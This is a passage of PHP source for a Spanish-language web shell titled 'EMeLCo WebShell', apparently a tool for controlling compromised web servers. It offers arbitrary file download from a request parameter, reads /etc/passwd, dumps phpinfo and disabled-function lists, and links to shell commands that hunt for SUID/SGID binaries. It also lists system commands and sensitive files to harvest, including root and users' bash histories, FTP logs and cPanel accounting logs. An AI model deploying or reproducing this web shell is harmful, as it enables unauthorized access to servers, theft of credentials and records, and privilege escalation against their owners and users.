        die(base64_decode('R0lGODlhEAAQANUnAP/3xffkl+vPMfbgjf3zxP7ztvnpofz36PPbg/vuw+3Oaf/78/HVdvbjqvjqtfz0z/bmsPnqvYvAQI/ERJfLS//204nAP5XJSHqzM5bKSoS8O5LHR362N4C4OJDFReu8Ruu2PeuyN+vGUXKsLeuuMvzurP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACcALAAAAAAQABAAAAaFwNPJRDQJj8ijaTQyJpFFyqX4FC4zm4mlWewSRx6JhtNUiESCtKDbwRQB8EIBsB4umwDRZw8ChUhGXiIHhAkJDgSAQyILjQclJQYBAQMJiiYiFXKQkgMICA6XIg+QkZQIDAwQlx8EnKcMCgoNrAQPDwQJEQ4QDQ0RrH3CIcTFl17IVFXLQQA7'));  
    }elseif($_GET["imagen"]=="php"){
        die(base64_decode('R0lGODlhEAAQAMQfAOTq8+3x9pSty/L2+26NyLXa/JTI+lZtjYSiuFJrsUlVa8jj/oW05uft9XqVr9TZ6d3h76zU+93n8FJgebLD00NLXGqIqSkxQz5FVb/e/XuZ0MvM0Z/P+0BXo////////yH5BAEAAB8ALAAAAAAQABAAAAWloCeO5PidnoMggrA6sGN5qCA1AZ43DWAcNI8gsCgWM8gBgwH0UAbGBTJTGFibgYAm0ekmCIJCdSKSdDuBcyehiQzIns6gARkEBHMIe6AQdQAdEA1ogxAdBAB9cQEAD4CMEA9sABUiAoBqD2sEHBKVHg0ECVxeBAwGBhIYIhQeVAURERyzqAGrHhYPdjwAvQASARsXIg4HxhMTCgoVFRgYF3Al0iQhADs='));  
    }else{
        die();
    }
// Esto es para descargar archivos. Va arriba porque no se puede mandar nada antes
}elseif (( $_GET["w"] == "descargar" ) and (( $archivo = leerarchivo($_REQUEST["ruta"] ))!==FALSE)){
    header("Content-type: application/force-download");
    header('Content-Disposition: attachment; filename="'.urlencode(basename($_REQUEST["ruta"]))."\"\n");
    die($archivo);
}

// Mandamos el principio del html y el css
echo'
<html>
<head>
    <title>EMeLCo WebShell</title>
    <style>
        body{
            background-color: #ECF1EF;
            font-family: monospace;
        }
        table{
            font-size: 12px;
            color: #8B8378;
            font-family: monospace;
            margin-left: auto;
            margin-right: auto;
        }
        td{
            padding-right:10px;
            padding-left:10px;
            border: 1px dashed #BDB5AF;
        }
        #contenedorgrande{
            background-color: #EBECE4;
            font-size: 12px;
            color: #8B8378;
            margin:2% auto 2% auto;
            width:80%;
            border: 1px dashed #DDD5CF;
        }
        #contenedor{
            border: 2px solid #333333;
            padding: 1% 2% 2% 1%;
            margin: 0 auto 0 auto;
            border-color: #CDC5BF
        }
        .n{
            font-weight: bold;
            color: #CD2626;
        }
        .s{
            font-weight: bold;
            color: #8ABD22;
        }
        .inline{
            display:inline;
        }
        .f{
            font-weight: bold;
            display: inline;
            color: #8B8878;
        }
        .ac{
            text-align:right;
        }
        .ai{
            border: none;
        }
        h2{
            display:inline;
            color: #EE7600;
            font-weight: bold;
        }
        h1{
            color: #EE7600;
            font-weight: bold;
            text-decoration: none;
        }
        a{
            color:#838B8B;
        }
        a.sinsubrayado{
            text-decoration: none;
        }
        a:hover{
            font-size:105%;
            font-weight: bold;
        }
        textarea:focus, textarea:hover, input:hover, input:focus {
            border: 2px solid #EE7621;
        }
        /* Estilo para el phpinfo */
        #phpinfo {width: 100%;}
        #phpinfo body, #phpinfo td, #phpinfo th, #phpinfo h1, #phpinfo h2 {font-family: sans-serif;}
        #phpinfo pre {margin: 0px; font-family: monospace;}
        #phpinfo a, #phpinfo a:link, #phpinfo a:hover {color: #EE7600; font-weight: bold; text-decoration: none; font-size:100%;}
        #phpinfo .e {background-color: #EBECE4; font-weight: bold; color: #8B8378;}
        #phpinfo .h {background-color: #ECF1EF; font-weight: bold; color: #8B8378;}
        #phpinfo .v {background-color: #ECF1EF; color: #8B8378;}
        #phpinfo td {font-size: 100%;}
        .center {text-align: center;}
        #phpinfo .center table { margin-left: auto; margin-right: auto; text-align: left;}
        #phpinfo .center th { text-align: center !important; }
        #phpinfo td {vertical-align: baseline;}
        #phpinfo th {border: 2px dashed #BDB5AF;}
        #phpinfo h1 {font-size: 150%;}
        #phpinfo h2 {font-size: 125%;}
        #phpinfo .p {text-align: left;}
        #phpinfo .vr {background-color: #cccccc; text-align: right; color: #000000;}
        #phpinfo img {float: right; border: 0px;}
        #phpinfo hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}
    </style>    
</head>
<body>
    <div id="contenedorgrande">
    <div id="contenedor">
';


switch($_GET["w"]){
    
    /* Mostramos las directivas mas importantes de php.ini y su explicación */
    case "directivas";
        
        /* Creamos un array con todas las directivas y su descripcion */
        
        //safe mode http://ar2.php.net/manual/en/ini.sect.safe-mode.php
        $functions[]=array("<h2>Safe-Mode</h2>",'<a href="http://ar2.php.net/manual/en/ini.sect.safe-mode.php">http://ar2.php.net/manual/en/ini.sect.safe-mode.php</a>');
        $functions[]=leerconfig('safe_mode',' Whether to enable PHP&#039;s safe mode. If PHP is compiled with --enable-safe-mode then defaults to On, otherwise Off.');
        $functions[]=leerconfig('safe_mode_gid',' By default, Safe Mode does a UID compare check when opening files. If you want to relax this to a GID compare, then turn on safe_mode_gid. Whether to use UID (FALSE) or GID (TRUE) checking upon file access. ');
        $functions[]=leerconfig('safe_mode_include_dir',' UID/GID checks are bypassed when including files from this directory and its subdirectories (directory must also be in include_path or full path must including). As of PHP 4.2.0, this directive can take a colon (semi-colon on Windows) separated path in a fashion similar to the include_path directive, rather than just a single directory. The restriction specified is actually a prefix, not a directory name. This means that &quot;safe_mode_include_dir = /dir/incl&quot; also allows access to &quot;/dir/include&quot; and &quot;/dir/incls&quot; if they exist. When you want to restrict access to only the specified directory, end with a slash. For example: &quot;safe_mode_include_dir = /dir/incl/&quot; If the value of this directive is empty, no files with different UID/GID can be included in PHP 4.2.3 and as of PHP 4.3.3. In earlier versions, all files could be included. ');
        $functions[]=leerconfig('safe_mode_exec_dir',' If PHP is used in safe mode, system() and the other functions executing system programs  refuse to start programs that are not in this directory. You have to use / as directory separator on all environments including Windows. ');
        $functions[]=leerconfig('safe_mode_allowed_env_vars',' Setting certain environment variables may be a potential security breach. This directive contains a comma-delimited list of prefixes. In Safe Mode, the user may only alter environment variables whose names begin with the prefixes supplied here. By default, users will only be able to set environment variables that begin with PHP_  (e.g. PHP_FOO=BAR).     Note: If this directive is empty, PHP will let the user modify ANY environment variable! ');
        $functions[]=leerconfig('safe_mode_protected_env_vars',' This directive contains a comma-delimited list of environment variables that the end user won&#039;t be able to change using putenv(). These variables will be protected even if safe_mode_allowed_env_vars is set to allow to change them. ');
        $functions[]=leerconfig('open_basedir',' Limit the files that can be opened by PHP to the specified directory-tree, including the file itself. This directive is NOT affected by whether Safe Mode is turned On or Off. When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory-tree, PHP will refuse to open it. All symbolic links are resolved, so it&#039;s not possible to avoid this restriction with a symlink. If the file doesn&#039;t exist then the symlink couldn&#039;t be resolved and the filename is compared to (a resolved) open_basedir. The special value . indicates that the working directory of the script will be used as the base-directory. This is, however, a little dangerous as the working directory of the script can easily be changed with chdir(). In httpd.conf, open_basedir can be turned off (e.g. for some virtual hosts) the same way as any other configuration directive with &quot;php_admin_value open_basedir none&quot;. Under Windows, separate the directories with a semicolon. On all other systems, separate the directories with a colon. As an Apache module, open_basedir paths from parent directories are now automatically inherited. The restriction specified with open_basedir is actually a prefix, not a directory name. This means that &quot;open_basedir = /dir/incl&quot; also allows access to &quot;/dir/include&quot; and &quot;/dir/incls&quot; if they exist. When you want to restrict access to only the specified directory, end with a slash. For example: open_basedir = /dir/incl/ The default is to allow all files to be opened.      Note: As of PHP 5.3.0 open_basedir can be tightened at run-time. This means that if open_basedir is set to /www/ in php.ini a script can tighten the configuration to /www/tmp/ at run-time with ini_set() ');
        $functions[]=leerconfig('disable_functions',' This directive allows you to disable certain functions for security reasons. It takes on a comma-delimited list of function names. disable_functions is not affected by Safe Mode.   This directive must be set in php.ini For example, you cannot set this in httpd.conf. ');
        $functions[]=leerconfig('disable_classes',' This directive allows you to disable certain classes for security reasons. It takes on a comma-delimited list of class names. disable_classes is not affected by Safe Mode.   This directive must be set in php.ini For example, you cannot set this in httpd.conf. ');
        
        //errores http://ar2.php.net/manual/en/errorfunc.configuration.php
        $functions[]=array("<h2>Errores</h2>",'<a href="http://ar2.php.net/manual/en/errorfunc.configuration.php">http://ar2.php.net/manual/en/errorfunc.configuration.php</a>');
        $functions[]=leerconfig('log_errors',' Tells whether script error messages should be logged to the server&#039;s error log or error_log. This option is thus server-specific.    Note: You&#039;re strongly advised to use error logging in place of error displaying on production web sites. ');
        $functions[]=leerconfig('log_errors_max_len',' Set the maximum length of log_errors in bytes. In error_log information about the source is added. The default is 1024 and 0 allows to not apply any maximum length at all. This length is applied to logged errors, displayed errors and also to $php_errormsg.      When an integer is used, the value is measured in bytes. Shorthand notation, as described in this FAQ, may also be used. ');
        $functions[]=leerconfig('error_log',' Name of the file where script errors should be logged. The file should be writable by the web server&#039;s user. If the special value syslog is used, the errors are sent to the system logger instead. On Unix, this means syslog(3) and on Windows NT it means the event log. The system logger is not supported on Windows 95. See also: syslog(). If this directive is not set, errors are sent to the SAPI error logger. For example, it is an error log in Apache or stderr in CLI.');
        $functions[]=leerconfig('error_reporting',' Set the error reporting level. The parameter is either an integer representing a bit field, or named constants. The error_reporting levels and constants are described in Predefined Constants, and in php.ini. To set at runtime, use the error_reporting() function. See also the display_errors directive. In PHP 4 and PHP 5 the default value is E_ALL & ~E_NOTICE. This setting does not show E_NOTICE level errors. You may want to show them during development. ');
        
        //Nucleo http://ar2.php.net/manual/en/ini.core.php
        $functions[]=array("<h2>Lenguaje</h2>",'<a href="http://ar2.php.net/manual/en/ini.core.php">http://ar2.php.net/manual/en/ini.core.php</a>');
        $functions[]=leerconfig('short_open_tag',' Tells whether the short form (&lt;? ?&gt; ) of PHP&#039;s open tag should be allowed. If you want to use PHP in combination with XML, you can disable this option in order to use &lt;?xml ?&gt;  inline. Otherwise, you can print it with PHP, for example: &lt;?php echo &#039;&lt;?xml version=&quot;1.0&quot;?&gt;&#039;; ?&gt; . Also if disabled, you must use the long form of the PHP open tag (&lt;?php ?&gt; ).    Note: This directive also affects the shorthand &lt;?= , which is identical to &lt;? echo . Use of this shortcut requires short_open_tag to be on. ');
        $functions[]=leerconfig('asp_tags',' Enables the use of ASP-like &lt;% %&gt; tags in addition to the usual &lt;?php ?&gt; tags. This includes the variable-value printing shorthand of &lt;%= $value %&gt;. For more information, see Escaping from HTML. ');
        
        //Limite de recursos http://ar2.php.net/manual/en/ini.core.php
        $functions[]=array("<h2>Limite de recursos</h2>",'<a href="http://ar2.php.net/manual/en/ini.core.php">http://ar2.php.net/manual/en/ini.core.php</a>');
        $functions[]=leerconfig('memory_limit',' This sets the maximum amount of memory in bytes that a script is allowed to allocate. This helps prevent poorly written scripts for eating up all available memory on a server. Note that to have no memory limit, set this directive to -1. Prior to PHP 5.2.1, in order to use this directive it had to be enabled at compile time by using -enable-memory-limit in the configure line. This was also required to define the functions memory_get_usage() and memory_get_peak_usage(). When an integer is used, the value is measured in bytes. Shorthand notation, as described in this FAQ, may also be used. ');
        
        //Manejo de datos http://ar2.php.net/manual/en/ini.core.php
        $functions[]=array("<h2>Manejo de datos</h2>",'<a href="http://ar2.php.net/manual/en/ini.core.php">http://ar2.php.net/manual/en/ini.core.php</a>');
        $functions[]=leerconfig('register_globals',' Whether or not to register the EGPCS (Environment, GET, POST, Cookie, Server) variables as global variables. As of ť PHP 4.2.0, this directive defaults to off. Please read the security chapter on Using register_globals for related information. Please note that register_globals cannot be set at runtime (ini_set()). Although, you can use .htaccess if your host allows it as described above. An example .htaccess entry: php_flag register_globals off .    Note: register_globals is affected by the variables_order directive. ');
        $functions[]=leerconfig('post_max_size','Sets max size of post data allowed. This setting also affects file upload. To upload large files, this value must be larger than upload_max_filesize.   If memory limit is enabled by your configure script, memory_limit also affects file uploading. Generally speaking, memory_limit should be larger than post_max_size .  When an integer is used, the value is measured in bytes. Shorthand notation, as described in this FAQ, may also be used.   If the size of post data is greater than post_max_size, the $_POST and $_FILES  superglobals  are empty. This can be tracked in various ways, e.g. by passing the $_GET variable to the script processing the data, i.e. &lt;form action=&quot;edit.php?processed=1&quot;&gt;, and then checking if $_GET[&#039;processed&#039;] is set.');
        $functions[]=leerconfig('gpc_order',' Set the order of GET/POST/COOKIE variable parsing. The default setting of this directive is "GPC". Setting this to "GP", for example, will cause PHP to completely ignore cookies and to overwrite any GET method variables with POST-method variables of the same name.    Note: This option is not available in PHP 4. Use variables_order instead. ');
        $functions[]=leerconfig('auto_prepend_file',' Specifies the name of a file that is automatically parsed before the main file. The file is included as if it was called with the require() function, so include_path is used. The special value none disables auto-prepending.');
        $functions[]=leerconfig('auto_append_file',' Specifies the name of a file that is automatically parsed after the main file. The file is included as if it was called with the require() function, so include_path is used. The special value none disables auto-appending.    Note: If the script is terminated with exit(), auto-append will not occur. ');
        $functions[]=leerconfig('default_charset',' As of 4.0.0, PHP always outputs a character encoding by default in the Content-type: header. To disable sending of the charset, simply set it to be empty. ');
        $functions[]=leerconfig('allow_webdav_methods',' Allow handling of WebDAV http requests within PHP scripts (eg. PROPFIND, PROPPATCH, MOVE, COPY, etc.). This directive does not exist as of PHP 4.3.2. If you want to get the post data of those requests, you have to set  always_populate_raw_post_data as well. ');

        //Rutas y carpetas http://ar2.php.net/manual/en/ini.core.php
        $functions[]=array("<h2>Rutas y carpetas</h2>",'<a href="http://ar2.php.net/manual/en/ini.core.php">http://ar2.php.net/manual/en/ini.core.php</a>');
        $functions[]=leerconfig('include_path',' Specifies a list of directories where the require(), include(), fopen(), file(), readfile() and file_get_contents()  functions look for files. The format is like the system&#039;s PATH environment variable: a list of directories separated with a colon in Unix or semicolon in Windows. ');
        $functions[]=leerconfig('doc_root',' PHP&#039;s &quot;root directory&quot; on the server. Only used if non-empty. If PHP is configured with safe mode, no files outside this directory are served. If PHP was not compiled with FORCE_REDIRECT, you should  set doc_root if you are running PHP as a CGI under any web server (other than IIS). The alternative is to use the  cgi.force_redirect configuration below. ');
        $functions[]=leerconfig('user_dir',' The base name of the directory used on a user&#039;s home directory for PHP files, for example public_html.');
        $functions[]=leerconfig('extension_dir',' In what directory PHP should look for dynamically loadable extensions. See also: enable_dl, and dl(). ');
        $functions[]=leerconfig('extension',' Which dynamically loadable extensions to load when PHP starts up.');
        $functions[]=leerconfig('zend_extension',' Absolute path to dynamically loadable Zend extension (for example APD) to load when PHP starts up. ');
        $functions[]=leerconfig('zend_extension_debug',' Variant of zend_extension  for extensions compilled with debug info. ');
        $functions[]=leerconfig('zend_extension_debug_ts',' Variant of zend_extension  for extensions compilled with debug info and thread safety. ');
        $functions[]=leerconfig('zend_extension_ts',' Variant of zend_extension  for extensions compilled with thread safety. ');
        $functions[]=leerconfig('cgi.force_redirect',' cgi.force_redirect is necessary to provide security running PHP as a CGI under most web servers. Left undefined, PHP turns this on by default. You can turn it off at your own risk.    Note: Windows Users: You can safely turn this off for IIS, in fact, you must. To get OmniHTTPD or Xitami to work you must turn it off. ');
        
        //Subida de archivos http://ar2.php.net/manual/en/ini.core.php
        $functions[]=array("<h2>Subida de archivos</h2>",'<a href="http://ar2.php.net/manual/en/ini.core.php">http://ar2.php.net/manual/en/ini.core.php</a>');
        $functions[]=leerconfig('file_uploads',' Whether or not to allow HTTP file uploads. See also the upload_max_filesize, upload_tmp_dir, and post_max_size directives. When an integer is used, the value is measured in bytes. Shorthand notation, as described in this FAQ, may also be used. ');
        $functions[]=leerconfig('upload_tmp_dir','The temporary directory used for storing files when doing file upload. Must be writable by whatever user PHP is running as. If not specified PHP will use the system&#039;s default. ');
        $functions[]=leerconfig('upload_max_filesize',' The maximum size of an uploaded file. When an integer is used, the value is measured in bytes. Shorthand notation, as described in this FAQ, may also be used. ');
        
        //SQL http://ar2.php.net/manual/en/ini.core.php
        $functions[]=array("<h2>SQL</h2>",'<a href="http://ar2.php.net/manual/en/ini.core.php">http://ar2.php.net/manual/en/ini.core.php</a>');
        $functions[]=leerconfig('sql.safe_mode','If turned on, database connect functions that specify default values will use those values in place of supplied arguments. For default values see connect function documentation for the relevant database. ');
        
        //Ejecución http://ar2.php.net/manual/en/info.configuration.php
        $functions[]=array("<h2>Ejecuci&oacute;n</h2>",'<a href="http://ar2.php.net/manual/en/info.configuration.php">http://ar2.php.net/manual/en/info.configuration.php</a>, <a href="http://ar2.php.net/manual/en/filesystem.configuration.php">http://ar2.php.net/manual/en/filesystem.configuration.php</a>');
        $functions[]=leerconfig('enable_dl',' This directive is really only useful in the Apache module version of PHP. You can turn dynamic loading of PHP extensions with dl() on and off per virtual server or per directory. The main reason for turning dynamic loading off is security. With dynamic loading, it&#039;s possible to ignore all open_basedir restrictions. The default is to allow dynamic loading, except when using safe mode. In safe mode, it&#039;s always impossible to use dl().');
        $functions[]=leerconfig('max_execution_time',' This sets the maximum time in seconds a script is allowed to run before it is terminated by the parser. This helps prevent poorly written scripts from tying up the server. The default setting is 30. When running PHP from the command line the default setting is 0. The maximum execution time is not affected by system calls, stream operations etc. Please see the set_time_limit() function for more details. You can not change this setting with ini_set() when running in safe mode. The only workaround is to turn off safe mode or by changing the time limit in the php.ini. Your web server can have other timeout configurations that may also interrupt PHP execution. Apache has a Timeout directive and IIS has a CGI timeout function. Both default to 300 seconds. See your web server documentation for specific details.');
        $functions[]=leerconfig('magic_quotes_gpc',' Sets the magic_quotes state for GPC (Get/Post/Cookie) operations. When magic_quotes are on, all &#039; (single-quote), &quot; (double quote), \ (backslash) and NUL&#039;s are escaped with a backslash automatically.    Note: In PHP 4, also $_ENV variables are escaped.    Note: If the magic_quotes_sybase directive is also ON it will completely override magic_quotes_gpc. Having both directives enabled means only single quotes are escaped as &#039;&#039;. Double quotes, backslashes and NUL&#039;s will remain untouched and unescaped. ');
        $functions[]=leerconfig('magic_quotes_runtime','If magic_quotes_runtime  is enabled, most functions that return data from any sort of external source including databases and text files will have quotes escaped with a backslash. If magic_quotes_sybase  is also on, a single-quote is escaped with a single-quote instead of a backslash. ');
        $functions[]=leerconfig('allow_url_fopen',' This option enables the URL-aware fopen wrappers that enable accessing URL object like files. Default wrappers are provided for the access of remote files  using the ftp or http protocol, some extensions like zlib may register additional wrappers.    Note: This setting can only be set in php.ini due to security reasons.    Note: This option was introduced immediately after the release of version 4.0.3. For versions up to and including 4.0.3 you can only disable this feature at compile time by using the configuration switch --disable-url-fopen-wrapper . ');
        $functions[]=leerconfig('allow_url_include',' This option allows the use of URL-aware fopen wrappers with the following functions: include(), include_once(), require(), require_once().    Note: This setting requires allow_url_fopen to be on. ');
        $functions[]=leerconfig('default_socket_timeout',' Default timeout (in seconds) for socket based streams.    Note: This configuration option was introduced in PHP 4.3.0 ');
        
        /* Mostramos el titulo */
        echo '<div style="text-align:center;">
        <a href="'.$rfiurl.'" class="sinsubrayado"><h1>'.$nombre.'</h1></a><br><br>
        </div>';
        
        /* Mostramos toda la información del array */
        foreach ($functions as $funcion){
            echo $funcion[0].' =&gt; '.$funcion[1].'<br>'."\n";
        }
    break;

    /* PHPInfo */
    case "phpinfo":
        /* Mostramos el titulo */
        echo '<div style="text-align:center;">
        <a href="'.$rfiurl.'" class="sinsubrayado"><h1>'.$nombre.'</h1></a><br><br>
        </div>';
        
        /* Este div tiene un estilo unico para el phpinfo */
        echo '<div id="phpinfo">';
        /* All your phpinfo() are belog to us */
        ob_flush();
        ob_start();
            phpinfo();
            $phpinfo = ob_get_clean();
            // Eliminamos un pedazo de html que agrega el phpinfo para que no quede duplicado
            $phpinfo = str_replace('</body></html>','',substr($phpinfo,strpos($phpinfo,'<body>')+6));
        ob_end_clean();
        echo $phpinfo.'</div>';
    break;

    /* Mas informacion */
    case "info":
        /* Mostramos el titulo */
        echo '<div style="text-align:center;">
        <a href="'.$rfiurl.'" class="sinsubrayado"><h1>'.$nombre.'</h1></a><br><br>
        </div>';
        
        $ruta = getcwd() or '/';
        
        if((!ini_get("safe_mode")) or (strtolower(ini_get("safe_mode"))=="off")){
            $safemode = "No";
        }else{
            $safemode = "Si";
        } 
        
        echo 'Ubicaci&oacute;n: '.htmlentities(__FILE__, ENT_QUOTES, 'UTF-8').'<br>
        Libre: '.htmlentities(decodeSize(disk_free_space($ruta)).' / '.decodeSize(disk_total_space($ruta)), ENT_QUOTES, 'UTF-8').'<br>
        Safe_mode: '.$safemode.'<br>
        Funciones desactivadas: '.htmlentities(ini_get("disable_functions"), ENT_QUOTES, 'UTF-8').'<br>
        PHP: '.htmlentities(phpversion(), ENT_QUOTES, 'UTF-8').'<br>
        Zend: '.htmlentities(zend_version(), ENT_QUOTES, 'UTF-8').'<br>
        <br>
        IP: '.htmlentities($_SERVER['SERVER_ADDR'], ENT_QUOTES, 'UTF-8').'<br>
        Puerto: '.htmlentities($_SERVER['SERVER_PORT'], ENT_QUOTES, 'UTF-8').'<br>
        Servidor: '.htmlentities($_SERVER['SERVER_NAME'], ENT_QUOTES, 'UTF-8').'<br>
        Software del servidor: '.htmlentities($_SERVER['SERVER_SOFTWARE'], ENT_QUOTES, 'UTF-8').'<br>
        Uname: '.htmlentities(php_uname(), ENT_QUOTES, 'UTF-8').'<br>
        <br>
        ';
        $usuarios = explode("\n",leerarchivo("/etc/passwd"));
        
/*Esta es la lista de cosas a mostrar
Si empieza con > es un titulo
Si empieza con < es un comando
Si no, es un archivo */
$comandos =
'><a href="'.$rfiurl.'w=shell&comando=find%20%2F%20-type%20f%20-perm%20-04000%20-ls ">Ver archivos con SUID</a>
><a href="'.$rfiurl.'w=shell&comando=find%20%2F%20-type%20f%20-perm%20-02000%20-ls ">Ver archivos con SGID</a>
>Memoria
<free -m
>Discos / Particiones
<df -h
<mount
/etc/fstab
>Ejecutables
<whereis curl
<whereis lynx
<whereis links
<whereis apache
<whereis php
<whereis ruby
<whereis mysql
<whereis wget
<whereis perl
<whereis python
<whereis gcc
<whereis apt-get
<whereis aptitude
<whereis yum
<whereis pacman
>Version
<sysctl -a | egrep "ostype |osrelease |version |hostname |domainname "|grep kernel.
/proc/version
/etc/issue.net
/etc/issue
/etc/motd
/etc/lsb-release
>Conexiones
<netstat -pa
>Hardware
/proc/cpuinfo
<dmidecode
>Logs
/root/.bash_history
'.archivosdeusuarios("/.bash_history").'
'.archivosdeusuarios("/public_html/.bash_history").'
/var/log/pure-ftpd/pure-ftpd.log
/logs/pure-ftpd.log
/var/log/pureftpd.log
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy
/var/log/ftplog
/etc/logrotate.d/ftp
/etc/ftpchroot
/etc/ftphosts
/usr/lib/security/mkuser.default
/var/cpanel/accounting.log
/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix
/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/er…

Large files files are truncated, but you can click here to view the full file